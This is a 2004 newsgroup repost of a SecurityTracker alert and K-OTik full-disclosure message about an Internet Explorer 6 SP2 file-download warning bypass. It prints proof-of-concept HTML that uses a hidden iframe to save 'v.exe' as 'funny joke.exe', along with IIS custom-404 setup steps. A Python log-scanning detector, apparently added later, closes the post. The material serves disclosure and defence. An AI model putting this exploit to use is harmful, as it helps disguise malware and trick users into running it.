Microsoft IE Custom 404 Error Message and execCommand SaveAs Lets Remote Users Bypass XP SP2 Download Warning Mechanisms


From: JM Tella Llop [MVP Windows] (jmtella_at_XXXmvps.org)
Date: 11/21/04


Date: Sun, 21 Nov 2004 19:09:52 +0100

Microsoft IE Custom 404 Error Message and execCommand SaveAs Lets
Remote Users Bypass XP SP2 Download Warning Mechanisms

SecurityTracker Alert ID: 1012288
SecurityTracker URL: http://securitytracker.com/id?1012288
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Nov 20 2004
Impact: Modification of system information, Modification of user
information
Exploit Included: Yes
Version(s): 6
Description: A vulnerability was reported in Microsoft Internet
Explorer (IE) on Windows XP SP2. A remote user can invoke the
execCommand 'SaveAs' function via a custom HTTP 404 Not Found error
message to download arbitrary files to the target user's system
without the XP SP2 warning messages.

K-OTik posted technical details regarding the flaw disclosed by
cyber_flash (vengy).

It is reported that Internet Explorer does not properly process URLs
with certain extraneous characters.

A remote user can create a custom HTTP 404 error message and pass this
message to the execCommand Method to bypass the 'File Download' and
'File Open' security warnings.

Some demonstration exploit code is provided:

<html>
<body>
<iframe src='http://your.domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>
Click <a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">here</a>.
</body>
</html>

The following HTML, when loaded by the target user, will then trigger
the download prompt:

<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>

The user will be asked to save the document as an HTML document, but
will not be warned that the file is an executable. If the 'Hide file
extensions for known file types' option is enabled, then the file name
in this exploit example will appear as 'funny joke' (instead of the
true name 'funny joke.exe').

The original advisory is mirrored at:

http://www.k-otik.com/exploits/20041119.IESP2disclosure.php
Impact: A remote user can create HTML that, when loaded by the target
user, will prompt the user to download a file but will bypass the XP
SP2 executable download warning messages.
Solution: No solution was available at the time of this entry.
Vendor URL: www.microsoft.com/ (Links to External Site)
Cause: Access control error, State error
Underlying OS: Windows (Any)
Underlying OS Comments: Tested on Windows 2000 and XP SP2
Reported By: K-OTiK Security <Special-Alerts@k-otik.com>
Message History: None.

 Source Message Contents
Date: 20 Nov 2004 05:50:23 -0000
From: K-OTiK Security <Special-Alerts@k-otik.com>
Subject: Microsoft Internet Explorer 6 SP2 Vulnerabilities / Full

 

Let's play,

On Wednesday 17, Nov - Secunia released the advisory "Microsoft
Internet Explorer Two Vulnerabilities", related to a vulnerability
discovered by "cyber flash". This unpatched "file download security
warning bypass" flaw could be exploited to download a malicious executable
file masqueraded as a "HTML document".

Microsoft said : "Secunia you're bad, this vulnerability was not
disclosed responsibly"

Secunia said "NO ! No ! We did not release the technical details of
this flaw and our policy is to not reveal vulnerability details
until a fix had been provided, unless they were already in the wild.
We did not discover this vulnerability, so we can not censure it"

Some people said "Who is cyberflash ? perhaps Secunia discovered this
flaw, but masked it behind a third party researcher"

K-OTik Says to "Some people" : "cyber flash is not a fictitious
security researcher"
K-OTik Says to "MS & Secunia" : "There is no security through
obscurity...and full disclosure is our policy"

----------------------------------------------------------------
Internet Explorer 6.0 SP2 File Download Security Warning Bypass
----------------------------------------------------------------

Exploit -> http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php
Technical Details -> http://www.k-otik.com/exploits/20041119.IESP2disclosure.php

all credits go to Cyber flash A.K.A Vengy

Regards
K-OTik Security Research & Survey Team 24/7
http://www.k-otik.com

<cyberflash>
The following code requires no special server setup, and should work
from any webpage that IE 6.0 fetches:

<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">here</a>

Also, here's an example that requires modifying the IIS Error Mapping
Properties (see below):

<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">here</a>.

Steps to configure IIS:

Launch Internet Information Services manager.
Under the 'Custom Errors' tab, modify the Error Mapping Properties as
follows:

Error Code: 404
Default Text: Not Found
Message Type: URL
URL: /v.exe (name of the executable)
Within the HTML page, insert an IFRAME as follows:

<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>

The file 'vengy404.htm' intentionally doesn't exist on the server, so
it will trigger a 404 error message as defined above. But, the
javascript code below references the stealthy v.exe data within the
frame 'NotFound' and is linked to 'funny joke.exe' when prompted
to save the file:

javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');
</cyberflash>
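As an added illustration from the detection side (not part of the advisory or of cyberflash's code), the following Python shows why a suffix check on the whole URL is fooled by the 'v.exe?.htm' trick described above, and scans constructed IIS W3C log lines (field layout assumed) for requests whose real path is an executable while the query string ends in a document-like extension. It covers only the query-string variant; the custom-404 mapping variant leaves no such marker in the request line.

```python
from urllib.parse import urlsplit

# Extensions IE-era clients treat as executable content.
EXECUTABLE_EXTS = {"exe", "com", "scr", "bat", "cmd", "pif"}
# Extensions a lure appends after '?' so the URL looks like a document.
DOCUMENT_EXTS = {"htm", "html", "txt"}


def extension_of(name):
    """Extension of the last '/'-separated segment, lower-cased ('' if none)."""
    tail = name.rsplit("/", 1)[-1]
    return tail.rsplit(".", 1)[-1].lower() if "." in tail else ""


def apparent_vs_actual(url):
    """Return (extension a naive whole-URL suffix check sees,
               extension of the real path with the query removed)."""
    parts = urlsplit(url)
    whole = parts.path + ("?" + parts.query if parts.query else "")
    return extension_of(whole), extension_of(parts.path)


def is_suspicious(url):
    """True when the query string disguises an executable path as a document."""
    apparent, actual = apparent_vs_actual(url)
    return apparent in DOCUMENT_EXTS and actual in EXECUTABLE_EXTS


# Constructed sample log in IIS W3C extended format (assumed field order).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2004-11-20 05:50:23 GET /index.htm - 200
2004-11-20 05:50:24 GET /v.exe .htm 200
2004-11-20 05:50:25 GET /vengy404.htm - 404
"""


def scan_log(text):
    """Return the cs-uri-stem of every request matching the disguise pattern."""
    flagged = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue  # skip directives and blank lines
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed line, ignore
        stem, query = fields[3], fields[4]
        if query != "-" and is_suspicious(stem + "?" + query):
            flagged.append(stem)
    return flagged
```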

 


Copyright 2004, SecurityGlobal.net LLC

-- 
Jose Manuel Tella Llop
MVP - Windows
jmtella@XXXcompuserve.com   (remove XXX)
http://www.multingles.net/jmt.htm
This message is provided "as is" without warranties of any kind, and
confers no rights.
This posting is provided "AS IS" with no warranties, and confers no
rights.
You assume all risk for your use.

